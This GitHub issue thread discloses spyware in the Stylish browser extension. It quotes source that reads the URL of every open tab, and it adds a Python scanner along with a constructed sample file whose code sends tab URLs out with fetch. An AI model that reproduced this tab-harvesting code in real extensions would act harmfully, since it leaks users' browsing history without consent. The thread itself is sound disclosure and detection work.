stylish-userstyles / stylish

User styles manager for Firefox and other Mozilla software
https://userstyles.org
GNU General Public License v3.0

[WARNING] Stylish 3.1.1 in AMO contains spyware #335

Open Lekensteyn opened 6 years ago

Lekensteyn commented 6 years ago

Hi users of Stylish,

It appears that the Stylish extension (based on the code in this repo) has gained tracking code. Using Rob's excellent CRX Viewer I noticed some fishy code in src/background.js that was loaded on startup and code that was injected in every Google search page. Effects:

  1. The full URL of all open tabs and all pages you visit.
  2. The titles and URLs of every Google search result

Recommended steps:

  1. Remove the Stylish extension (Firefox should already have disabled the extension)
  2. (Optional:) install https://github.com/openstyles/stylus as replacement

Proof: https://twitter.com/Lekensteyn/status/1014307299475763201
More details: https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/ https://bugzilla.mozilla.org/show_bug.cgi?id=1472948

Relevant extract for the first issue (src/background.js):

// Runs on extension startup; isRealUrlAddress and stylesUpdater are defined elsewhere in src/background.js
chrome.windows.getAll({
    populate: true
}, function(windows) {
    for (var w = 0; w < windows.length; w++) {
        for (var i = 0; i < windows[w].tabs.length; i++) {
            if (!isRealUrlAddress(windows[w].tabs[i].url)) {
                continue;
            }
            stylesUpdater.updateQueryParams(windows[w].tabs[i].id, {
                reset: true,
                gp: windows[w].tabs[i].url // <-- WTF
            });
            if (windows[w].focused && windows[w].tabs[i].active) {
                stylesUpdater.gpStyleUpdate(windows[w].tabs[i]);
            }
        }
    }
});
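
To check an add-on archive for the pattern shown in the extract above, here is an added example (not Stylish's code and not from the reporter) that unzips an extension package (.xpi/.crx are zip files) and flags JavaScript files that both enumerate tab URLs through the windows/tabs APIs and make network calls. The sample archive and the `updateUrl` name inside it are constructed for the demonstration, and the regex markers are an assumed heuristic: a match is a lead for manual review, not proof of exfiltration.

```python
import io
import re
import zipfile

# Assumed heuristic markers: APIs that read tab URLs, and APIs that send data out.
TAB_URL_ACCESS = re.compile(
    r"chrome\.(windows\.getAll|tabs\.(query|get))|\.tabs\[[^\]]+\]\.url"
)
NETWORK_SEND = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b")


def audit_extension(archive_bytes):
    """Scan every .js file in the archive; return per-file findings."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".js"):
                continue
            src = zf.read(name).decode("utf-8", errors="replace")
            reads = bool(TAB_URL_ACCESS.search(src))
            sends = bool(NETWORK_SEND.search(src))
            findings[name] = {
                "reads_tab_urls": reads,
                "sends_network": sends,
                "suspicious": reads and sends,  # both in one file: review it by hand
            }
    return findings


def build_sample_xpi():
    """Constructed sample: one file mirrors the reported tab loop, one is benign."""
    spy_js = """
chrome.windows.getAll({populate: true}, function(windows) {
  for (var w = 0; w < windows.length; w++)
    for (var i = 0; i < windows[w].tabs.length; i++)
      fetch(updateUrl + "?gp=" + encodeURIComponent(windows[w].tabs[i].url));
});
"""
    benign_js = "document.body.appendChild(document.createElement('style'));\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", '{"manifest_version": 2, "name": "sample"}')
        zf.writestr("src/background.js", spy_js)
        zf.writestr("src/content.js", benign_js)
    return buf.getvalue()


if __name__ == "__main__":
    for path, info in audit_extension(build_sample_xpi()).items():
        print(path, info)
```
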

333van commented 6 years ago

The news was available in 2017. You can opt-out but I am leaving Stylish and going for Stylus.

Lekensteyn commented 6 years ago

@IAMEVANHE AFAIK that was limited to the Chrome extension, I don't know when the Firefox extension started getting such malicious behavior.

sparskakyl commented 6 years ago

Well, you can modify/remove fishy code to make it not spyware.

Lekensteyn commented 6 years ago

@sparskakyl You are missing the point.

"Vertrouwen komt te voet en vertrekt te paard." (Dutch: "Trust comes on foot and leaves on horseback.") "Once bitten, twice shy"

There is no way I am ever going to use this extension again. Perhaps Stylus, but for now I have replaced the styles that I still use by some Greasemonkey scripts. For example:

// ==UserScript==
// @name      Style: Show Bugzilla attachment ID
// @namespace https://lekensteyn.nl/
// @match     https://bugs.wireshark.org/*
// @version   1
// @grant     none
// ==/UserScript==

// Inject the CSS as a <style> element; Greasemonkey runs this after the body exists by default
((css) => {
  let style = document.createElement("style");
  style.textContent = css;
  document.body.appendChild(style);
})(`
a[href^="#attach_"]:before {
  font-size: medium;
  content: attr(href) ": ";
}
`);

dragetd commented 6 years ago

The original author sold the name and Mozilla add-on repo access to a data mining company. He was fully aware where this was going and left in the dark the users who did not actively search for this information.

I blame @JasonBarnabe just as much as this company for this move!